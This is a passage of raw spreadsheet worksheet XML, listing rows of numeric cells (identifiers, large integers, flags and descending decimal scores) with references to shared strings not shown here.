      <c r="B24124" s="2">
        <v>4903910.0</v>
      </c>
      <c r="C24124" s="2" t="s">
        <v>23239</v>
      </c>
      <c r="D24124" s="2">
        <v>1.0</v>
      </c>
      <c r="E24124" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24124" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="24125" ht="15.75" customHeight="1">
      <c r="A24125" s="1">
        <v>2466.0</v>
      </c>
      <c r="B24125" s="2">
        <v>3.3818445E7</v>
      </c>
      <c r="C24125" s="2" t="s">
        <v>23240</v>
      </c>
      <c r="D24125" s="2">
        <v>1.0</v>
      </c>
      <c r="E24125" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24125" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24126" ht="15.75" customHeight="1">
      <c r="A24126" s="1">
        <v>22572.0</v>
      </c>
      <c r="B24126" s="2">
        <v>3.8610372E7</v>
      </c>
      <c r="C24126" s="2" t="s">
        <v>23241</v>
      </c>
      <c r="D24126" s="2">
        <v>1.0</v>
      </c>
      <c r="E24126" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24126" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24127" ht="15.75" customHeight="1">
      <c r="A24127" s="1">
        <v>23975.0</v>
      </c>
      <c r="B24127" s="2">
        <v>9080593.0</v>
      </c>
      <c r="C24127" s="2" t="s">
        <v>23242</v>
      </c>
      <c r="D24127" s="2">
        <v>1.0</v>
      </c>
      <c r="E24127" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24127" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24128" ht="15.75" customHeight="1">
      <c r="A24128" s="1">
        <v>24630.0</v>
      </c>
      <c r="B24128" s="2">
        <v>1.1471439E7</v>
      </c>
      <c r="C24128" s="2" t="s">
        <v>23243</v>
      </c>
      <c r="D24128" s="2">
        <v>1.0</v>
      </c>
      <c r="E24128" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24128" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24129" ht="15.75" customHeight="1">
      <c r="A24129" s="1">
        <v>27930.0</v>
      </c>
      <c r="B24129" s="2">
        <v>2.3784073E7</v>
      </c>
      <c r="C24129" s="2" t="s">
        <v>23244</v>
      </c>
      <c r="D24129" s="2">
        <v>1.0</v>
      </c>
      <c r="E24129" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24129" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24130" ht="15.75" customHeight="1">
      <c r="A24130" s="1">
        <v>29961.0</v>
      </c>
      <c r="B24130" s="2">
        <v>3607736.0</v>
      </c>
      <c r="C24130" s="2" t="s">
        <v>23245</v>
      </c>
      <c r="D24130" s="2">
        <v>1.0</v>
      </c>
      <c r="E24130" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24130" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24131" ht="15.75" customHeight="1">
      <c r="A24131" s="1">
        <v>32270.0</v>
      </c>
      <c r="B24131" s="2">
        <v>5.5248151E7</v>
      </c>
      <c r="C24131" s="2" t="s">
        <v>23246</v>
      </c>
      <c r="D24131" s="2">
        <v>1.0</v>
      </c>
      <c r="E24131" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24131" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="24132" ht="15.75" customHeight="1">
      <c r="A24132" s="1">
        <v>18307.0</v>
      </c>
      <c r="B24132" s="2">
        <v>5.2371982E7</v>
      </c>
      <c r="C24132" s="2" t="s">
        <v>23247</v>
      </c>
      <c r="D24132" s="2">
        <v>1.0</v>
      </c>
      <c r="E24132" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24132" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="24133" ht="15.75" customHeight="1">
      <c r="A24133" s="1">
        <v>26134.0</v>
      </c>
      <c r="B24133" s="2">
        <v>1.5998661E7</v>
      </c>
      <c r="C24133" s="2" t="s">
        <v>23172</v>
      </c>
      <c r="D24133" s="2">
        <v>1.0</v>
      </c>
      <c r="E24133" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24133" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="24134" ht="15.75" customHeight="1">
      <c r="A24134" s="1">
        <v>31764.0</v>
      </c>
      <c r="B24134" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C24134" s="2" t="s">
        <v>23248</v>
      </c>
      <c r="D24134" s="2">
        <v>1.0</v>
      </c>
      <c r="E24134" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24134" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="24135" ht="15.75" customHeight="1">
      <c r="A24135" s="1">
        <v>21541.0</v>
      </c>
      <c r="B24135" s="2">
        <v>2.3524838E7</v>
      </c>
      <c r="C24135" s="2" t="s">
        <v>23249</v>
      </c>
      <c r="D24135" s="2">
        <v>1.0</v>
      </c>
      <c r="E24135" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24135" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="24136" ht="15.75" customHeight="1">
      <c r="A24136" s="1">
        <v>27665.0</v>
      </c>
      <c r="B24136" s="2">
        <v>2.2924248E7</v>
      </c>
      <c r="C24136" s="2" t="s">
        <v>23250</v>
      </c>
      <c r="D24136" s="2">
        <v>1.0</v>
      </c>
      <c r="E24136" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24136" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="24137" ht="15.75" customHeight="1">
      <c r="A24137" s="1">
        <v>27868.0</v>
      </c>
      <c r="B24137" s="2">
        <v>2.3524837E7</v>
      </c>
      <c r="C24137" s="2" t="s">
        <v>23251</v>
      </c>
      <c r="D24137" s="2">
        <v>1.0</v>
      </c>
      <c r="E24137" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24137" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="24138" ht="15.75" customHeight="1">
      <c r="A24138" s="1">
        <v>20365.0</v>
      </c>
      <c r="B24138" s="2">
        <v>1.1770089E7</v>
      </c>
      <c r="C24138" s="2" t="s">
        <v>23252</v>
      </c>
      <c r="D24138" s="2">
        <v>1.0</v>
      </c>
      <c r="E24138" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24138" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24139" ht="15.75" customHeight="1">
      <c r="A24139" s="1">
        <v>23942.0</v>
      </c>
      <c r="B24139" s="2">
        <v>8823270.0</v>
      </c>
      <c r="C24139" s="2" t="s">
        <v>23253</v>
      </c>
      <c r="D24139" s="2">
        <v>1.0</v>
      </c>
      <c r="E24139" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24139" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24140" ht="15.75" customHeight="1">
      <c r="A24140" s="1">
        <v>24280.0</v>
      </c>
      <c r="B24140" s="2">
        <v>1.0545918E7</v>
      </c>
      <c r="C24140" s="2" t="s">
        <v>23254</v>
      </c>
      <c r="D24140" s="2">
        <v>1.0</v>
      </c>
      <c r="E24140" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24140" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24141" ht="15.75" customHeight="1">
      <c r="A24141" s="1">
        <v>26613.0</v>
      </c>
      <c r="B24141" s="2">
        <v>1.8017774E7</v>
      </c>
      <c r="C24141" s="2" t="s">
        <v>23255</v>
      </c>
      <c r="D24141" s="2">
        <v>1.0</v>
      </c>
      <c r="E24141" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24141" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24142" ht="15.75" customHeight="1">
      <c r="A24142" s="1">
        <v>29257.0</v>
      </c>
      <c r="B24142" s="2">
        <v>3.0975792E7</v>
      </c>
      <c r="C24142" s="2" t="s">
        <v>23256</v>
      </c>
      <c r="D24142" s="2">
        <v>1.0</v>
      </c>
      <c r="E24142" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24142" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24143" ht="15.75" customHeight="1">
      <c r="A24143" s="1">
        <v>32237.0</v>
      </c>
      <c r="B24143" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C24143" s="2" t="s">
        <v>23257</v>
      </c>
      <c r="D24143" s="2">
        <v>1.0</v>
      </c>
      <c r="E24143" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24143" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24144" ht="15.75" customHeight="1">
      <c r="A24144" s="1">
        <v>32676.0</v>
      </c>
      <c r="B24144" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C24144" s="2" t="s">
        <v>23258</v>
      </c>
      <c r="D24144" s="2">
        <v>1.0</v>
      </c>
      <c r="E24144" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24144" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24145" ht="15.75" customHeight="1">
      <c r="A24145" s="1">
        <v>32689.0</v>
      </c>
      <c r="B24145" s="2">
        <v>5953420.0</v>
      </c>
      <c r="C24145" s="2" t="s">
        <v>23259</v>
      </c>
      <c r="D24145" s="2">
        <v>1.0</v>
      </c>
      <c r="E24145" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24145" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="24146" ht="15.75" customHeight="1">
      <c r="A24146" s="1">
        <v>5180.0</v>
      </c>
      <c r="B24146" s="2">
        <v>4.47607E7</v>
      </c>
      <c r="C24146" s="2" t="s">
        <v>23260</v>
      </c>
      <c r="D24146" s="2">
        <v>1.0</v>
      </c>
      <c r="E24146" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24146" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24147" ht="15.75" customHeight="1">
      <c r="A24147" s="1">
        <v>11508.0</v>
      </c>
      <c r="B24147" s="2">
        <v>2.218038E7</v>
      </c>
      <c r="C24147" s="2" t="s">
        <v>23261</v>
      </c>
      <c r="D24147" s="2">
        <v>1.0</v>
      </c>
      <c r="E24147" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24147" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24148" ht="15.75" customHeight="1">
      <c r="A24148" s="1">
        <v>12112.0</v>
      </c>
      <c r="B24148" s="2">
        <v>2.6875714E7</v>
      </c>
      <c r="C24148" s="2" t="s">
        <v>23262</v>
      </c>
      <c r="D24148" s="2">
        <v>1.0</v>
      </c>
      <c r="E24148" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24148" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24149" ht="15.75" customHeight="1">
      <c r="A24149" s="1">
        <v>17405.0</v>
      </c>
      <c r="B24149" s="2">
        <v>4.9641546E7</v>
      </c>
      <c r="C24149" s="2" t="s">
        <v>23263</v>
      </c>
      <c r="D24149" s="2">
        <v>1.0</v>
      </c>
      <c r="E24149" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24149" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24150" ht="15.75" customHeight="1">
      <c r="A24150" s="1">
        <v>23147.0</v>
      </c>
      <c r="B24150" s="2">
        <v>5.1755637E7</v>
      </c>
      <c r="C24150" s="2" t="s">
        <v>23264</v>
      </c>
      <c r="D24150" s="2">
        <v>1.0</v>
      </c>
      <c r="E24150" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24150" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24151" ht="15.75" customHeight="1">
      <c r="A24151" s="1">
        <v>26731.0</v>
      </c>
      <c r="B24151" s="2">
        <v>1.8274131E7</v>
      </c>
      <c r="C24151" s="2" t="s">
        <v>23265</v>
      </c>
      <c r="D24151" s="2">
        <v>1.0</v>
      </c>
      <c r="E24151" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24151" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24152" ht="15.75" customHeight="1">
      <c r="A24152" s="1">
        <v>30789.0</v>
      </c>
      <c r="B24152" s="2">
        <v>4.498578E7</v>
      </c>
      <c r="C24152" s="2" t="s">
        <v>23266</v>
      </c>
      <c r="D24152" s="2">
        <v>1.0</v>
      </c>
      <c r="E24152" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24152" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24153" ht="15.75" customHeight="1">
      <c r="A24153" s="1">
        <v>31757.0</v>
      </c>
      <c r="B24153" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C24153" s="2" t="s">
        <v>23267</v>
      </c>
      <c r="D24153" s="2">
        <v>1.0</v>
      </c>
      <c r="E24153" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24153" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24154" ht="15.75" customHeight="1">
      <c r="A24154" s="1">
        <v>34211.0</v>
      </c>
      <c r="B24154" s="2">
        <v>2.947992E7</v>
      </c>
      <c r="C24154" s="2" t="s">
        <v>23268</v>
      </c>
      <c r="D24154" s="2">
        <v>1.0</v>
      </c>
      <c r="E24154" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24154" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="24155" ht="15.75" customHeight="1">
      <c r="A24155" s="1">
        <v>13541.0</v>
      </c>
      <c r="B24155" s="2">
        <v>3.5621401E7</v>
      </c>
      <c r="C24155" s="2" t="s">
        <v>23269</v>
      </c>
      <c r="D24155" s="2">
        <v>1.0</v>
      </c>
      <c r="E24155" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24155" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24156" ht="15.75" customHeight="1">
      <c r="A24156" s="1">
        <v>15967.0</v>
      </c>
      <c r="B24156" s="2">
        <v>4.478792E7</v>
      </c>
      <c r="C24156" s="2" t="s">
        <v>23270</v>
      </c>
      <c r="D24156" s="2">
        <v>1.0</v>
      </c>
      <c r="E24156" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24156" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24157" ht="15.75" customHeight="1">
      <c r="A24157" s="1">
        <v>21357.0</v>
      </c>
      <c r="B24157" s="2">
        <v>2.1366992E7</v>
      </c>
      <c r="C24157" s="2" t="s">
        <v>23147</v>
      </c>
      <c r="D24157" s="2">
        <v>1.0</v>
      </c>
      <c r="E24157" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24157" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24158" ht="15.75" customHeight="1">
      <c r="A24158" s="1">
        <v>23923.0</v>
      </c>
      <c r="B24158" s="2">
        <v>8577659.0</v>
      </c>
      <c r="C24158" s="2" t="s">
        <v>23271</v>
      </c>
      <c r="D24158" s="2">
        <v>1.0</v>
      </c>
      <c r="E24158" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24158" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24159" ht="15.75" customHeight="1">
      <c r="A24159" s="1">
        <v>28808.0</v>
      </c>
      <c r="B24159" s="2">
        <v>2.866138E7</v>
      </c>
      <c r="C24159" s="2" t="s">
        <v>23191</v>
      </c>
      <c r="D24159" s="2">
        <v>1.0</v>
      </c>
      <c r="E24159" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24159" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24160" ht="15.75" customHeight="1">
      <c r="A24160" s="1">
        <v>31686.0</v>
      </c>
      <c r="B24160" s="2">
        <v>5191280.0</v>
      </c>
      <c r="C24160" s="2" t="s">
        <v>23272</v>
      </c>
      <c r="D24160" s="2">
        <v>1.0</v>
      </c>
      <c r="E24160" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24160" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24161" ht="15.75" customHeight="1">
      <c r="A24161" s="1">
        <v>32472.0</v>
      </c>
      <c r="B24161" s="2">
        <v>5688958.0</v>
      </c>
      <c r="C24161" s="2" t="s">
        <v>23273</v>
      </c>
      <c r="D24161" s="2">
        <v>1.0</v>
      </c>
      <c r="E24161" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24161" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24162" ht="15.75" customHeight="1">
      <c r="A24162" s="1">
        <v>33593.0</v>
      </c>
      <c r="B24162" s="2">
        <v>8331584.0</v>
      </c>
      <c r="C24162" s="2" t="s">
        <v>23274</v>
      </c>
      <c r="D24162" s="2">
        <v>1.0</v>
      </c>
      <c r="E24162" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24162" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="24163" ht="15.75" customHeight="1">
      <c r="A24163" s="1">
        <v>11640.0</v>
      </c>
      <c r="B24163" s="2">
        <v>2.3188192E7</v>
      </c>
      <c r="C24163" s="2" t="s">
        <v>23275</v>
      </c>
      <c r="D24163" s="2">
        <v>1.0</v>
      </c>
      <c r="E24163" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24163" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24164" ht="15.75" customHeight="1">
      <c r="A24164" s="1">
        <v>13739.0</v>
      </c>
      <c r="B24164" s="2">
        <v>3.6428651E7</v>
      </c>
      <c r="C24164" s="2" t="s">
        <v>23276</v>
      </c>
      <c r="D24164" s="2">
        <v>1.0</v>
      </c>
      <c r="E24164" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24164" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24165" ht="15.75" customHeight="1">
      <c r="A24165" s="1">
        <v>28758.0</v>
      </c>
      <c r="B24165" s="2">
        <v>2.8155114E7</v>
      </c>
      <c r="C24165" s="2" t="s">
        <v>23277</v>
      </c>
      <c r="D24165" s="2">
        <v>1.0</v>
      </c>
      <c r="E24165" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24165" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24166" ht="15.75" customHeight="1">
      <c r="A24166" s="1">
        <v>29942.0</v>
      </c>
      <c r="B24166" s="2">
        <v>3607501.0</v>
      </c>
      <c r="C24166" s="2" t="s">
        <v>23278</v>
      </c>
      <c r="D24166" s="2">
        <v>1.0</v>
      </c>
      <c r="E24166" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24166" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24167" ht="15.75" customHeight="1">
      <c r="A24167" s="1">
        <v>31325.0</v>
      </c>
      <c r="B24167" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C24167" s="2" t="s">
        <v>23279</v>
      </c>
      <c r="D24167" s="2">
        <v>1.0</v>
      </c>
      <c r="E24167" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24167" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24168" ht="15.75" customHeight="1">
      <c r="A24168" s="1">
        <v>31961.0</v>
      </c>
      <c r="B24168" s="2">
        <v>5310914.0</v>
      </c>
      <c r="C24168" s="2" t="s">
        <v>23280</v>
      </c>
      <c r="D24168" s="2">
        <v>1.0</v>
      </c>
      <c r="E24168" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24168" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24169" ht="15.75" customHeight="1">
      <c r="A24169" s="1">
        <v>32304.0</v>
      </c>
      <c r="B24169" s="2">
        <v>5558321.0</v>
      </c>
      <c r="C24169" s="2" t="s">
        <v>23281</v>
      </c>
      <c r="D24169" s="2">
        <v>1.0</v>
      </c>
      <c r="E24169" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24169" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="24170" ht="15.75" customHeight="1">
      <c r="A24170" s="1">
        <v>10501.0</v>
      </c>
      <c r="B24170" s="2">
        <v>1.1406565E7</v>
      </c>
      <c r="C24170" s="2" t="s">
        <v>23282</v>
      </c>
      <c r="D24170" s="2">
        <v>1.0</v>
      </c>
      <c r="E24170" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24170" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24171" ht="15.75" customHeight="1">
      <c r="A24171" s="1">
        <v>17783.0</v>
      </c>
      <c r="B24171" s="2">
        <v>5.0779006E7</v>
      </c>
      <c r="C24171" s="2" t="s">
        <v>23283</v>
      </c>
      <c r="D24171" s="2">
        <v>1.0</v>
      </c>
      <c r="E24171" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24171" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24172" ht="15.75" customHeight="1">
      <c r="A24172" s="1">
        <v>21440.0</v>
      </c>
      <c r="B24172" s="2">
        <v>2.2327771E7</v>
      </c>
      <c r="C24172" s="2" t="s">
        <v>23284</v>
      </c>
      <c r="D24172" s="2">
        <v>1.0</v>
      </c>
      <c r="E24172" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24172" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24173" ht="15.75" customHeight="1">
      <c r="A24173" s="1">
        <v>21768.0</v>
      </c>
      <c r="B24173" s="2">
        <v>2.6341021E7</v>
      </c>
      <c r="C24173" s="2" t="s">
        <v>23285</v>
      </c>
      <c r="D24173" s="2">
        <v>1.0</v>
      </c>
      <c r="E24173" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24173" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24174" ht="15.75" customHeight="1">
      <c r="A24174" s="1">
        <v>28347.0</v>
      </c>
      <c r="B24174" s="2">
        <v>2.593097E7</v>
      </c>
      <c r="C24174" s="2" t="s">
        <v>23286</v>
      </c>
      <c r="D24174" s="2">
        <v>1.0</v>
      </c>
      <c r="E24174" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24174" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24175" ht="15.75" customHeight="1">
      <c r="A24175" s="1">
        <v>28410.0</v>
      </c>
      <c r="B24175" s="2">
        <v>2.634102E7</v>
      </c>
      <c r="C24175" s="2" t="s">
        <v>23285</v>
      </c>
      <c r="D24175" s="2">
        <v>1.0</v>
      </c>
      <c r="E24175" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24175" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24176" ht="15.75" customHeight="1">
      <c r="A24176" s="1">
        <v>28839.0</v>
      </c>
      <c r="B24176" s="2">
        <v>2.8924735E7</v>
      </c>
      <c r="C24176" s="2" t="s">
        <v>23287</v>
      </c>
      <c r="D24176" s="2">
        <v>1.0</v>
      </c>
      <c r="E24176" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24176" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24177" ht="15.75" customHeight="1">
      <c r="A24177" s="1">
        <v>28929.0</v>
      </c>
      <c r="B24177" s="2">
        <v>2.9552987E7</v>
      </c>
      <c r="C24177" s="2" t="s">
        <v>23288</v>
      </c>
      <c r="D24177" s="2">
        <v>1.0</v>
      </c>
      <c r="E24177" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24177" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24178" ht="15.75" customHeight="1">
      <c r="A24178" s="1">
        <v>29982.0</v>
      </c>
      <c r="B24178" s="2">
        <v>3.6106762E7</v>
      </c>
      <c r="C24178" s="2" t="s">
        <v>23289</v>
      </c>
      <c r="D24178" s="2">
        <v>1.0</v>
      </c>
      <c r="E24178" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24178" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24179" ht="15.75" customHeight="1">
      <c r="A24179" s="1">
        <v>30102.0</v>
      </c>
      <c r="B24179" s="2">
        <v>3.6541924E7</v>
      </c>
      <c r="C24179" s="2" t="s">
        <v>23290</v>
      </c>
      <c r="D24179" s="2">
        <v>1.0</v>
      </c>
      <c r="E24179" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24179" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24180" ht="15.75" customHeight="1">
      <c r="A24180" s="1">
        <v>31873.0</v>
      </c>
      <c r="B24180" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C24180" s="2" t="s">
        <v>23291</v>
      </c>
      <c r="D24180" s="2">
        <v>1.0</v>
      </c>
      <c r="E24180" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24180" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24181" ht="15.75" customHeight="1">
      <c r="A24181" s="1">
        <v>32497.0</v>
      </c>
      <c r="B24181" s="2">
        <v>5.7090817E7</v>
      </c>
      <c r="C24181" s="2" t="s">
        <v>23292</v>
      </c>
      <c r="D24181" s="2">
        <v>1.0</v>
      </c>
      <c r="E24181" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24181" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="24182" ht="15.75" customHeight="1">
      <c r="A24182" s="1">
        <v>28611.0</v>
      </c>
      <c r="B24182" s="2">
        <v>2.7128925E7</v>
      </c>
      <c r="C24182" s="2" t="s">
        <v>22922</v>
      </c>
      <c r="D24182" s="2">
        <v>1.0</v>
      </c>
      <c r="E24182" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24182" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="24183" ht="15.75" customHeight="1">
      <c r="A24183" s="1">
        <v>21197.0</v>
      </c>
      <c r="B24183" s="2">
        <v>1.9455172E7</v>
      </c>
      <c r="C24183" s="2" t="s">
        <v>23293</v>
      </c>
      <c r="D24183" s="2">
        <v>1.0</v>
      </c>
      <c r="E24183" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24183" s="2">
        <v>0.1171875</v>
      </c>
    </row>
    <row r="24184" ht="15.75" customHeight="1">
      <c r="A24184" s="1">
        <v>7563.0</v>
      </c>
      <c r="B24184" s="2">
        <v>5.1553734E7</v>
      </c>
      <c r="C24184" s="2" t="s">
        <v>23294</v>
      </c>
      <c r="D24184" s="2">
        <v>1.0</v>
      </c>
      <c r="E24184" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24184" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="24185" ht="15.75" customHeight="1">
      <c r="A24185" s="1">
        <v>22849.0</v>
      </c>
      <c r="B24185" s="2">
        <v>4.6819788E7</v>
      </c>
      <c r="C24185" s="2" t="s">
        <v>23295</v>
      </c>
      <c r="D24185" s="2">
        <v>1.0</v>
      </c>
      <c r="E24185" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24185" s="2">
        <v>0.117003367003367</v>
      </c>
    </row>
    <row r="24186" ht="15.75" customHeight="1">
      <c r="A24186" s="1">
        <v>27924.0</v>
      </c>
      <c r="B24186" s="2">
        <v>2.377664E7</v>
      </c>
      <c r="C24186" s="2" t="s">
        <v>23296</v>
      </c>
      <c r="D24186" s="2">
        <v>1.0</v>
      </c>
      <c r="E24186" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24186" s="2">
        <v>0.1168300653594771</v>
      </c>
    </row>
    <row r="24187" ht="15.75" customHeight="1">
      <c r="A24187" s="1">
        <v>1224.0</v>
      </c>
      <c r="B24187" s="2">
        <v>2.4943301E7</v>
      </c>
      <c r="C24187" s="2" t="s">
        <v>23297</v>
      </c>
      <c r="D24187" s="2">
        <v>1.0</v>
      </c>
      <c r="E24187" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24187" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="24188" ht="15.75" customHeight="1">
      <c r="A24188" s="1">
        <v>14635.0</v>
      </c>
      <c r="B24188" s="2">
        <v>4.0320141E7</v>
      </c>
      <c r="C24188" s="2" t="s">
        <v>23298</v>
      </c>
      <c r="D24188" s="2">
        <v>1.0</v>
      </c>
      <c r="E24188" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24188" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="24189" ht="15.75" customHeight="1">
      <c r="A24189" s="1">
        <v>29402.0</v>
      </c>
      <c r="B24189" s="2">
        <v>3.1975141E7</v>
      </c>
      <c r="C24189" s="2" t="s">
        <v>23299</v>
      </c>
      <c r="D24189" s="2">
        <v>1.0</v>
      </c>
      <c r="E24189" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24189" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="24190" ht="15.75" customHeight="1">
      <c r="A24190" s="1">
        <v>491.0</v>
      </c>
      <c r="B24190" s="2">
        <v>1.763231E7</v>
      </c>
      <c r="C24190" s="2" t="s">
        <v>23300</v>
      </c>
      <c r="D24190" s="2">
        <v>1.0</v>
      </c>
      <c r="E24190" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24190" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24191" ht="15.75" customHeight="1">
      <c r="A24191" s="1">
        <v>971.0</v>
      </c>
      <c r="B24191" s="2">
        <v>2.2755882E7</v>
      </c>
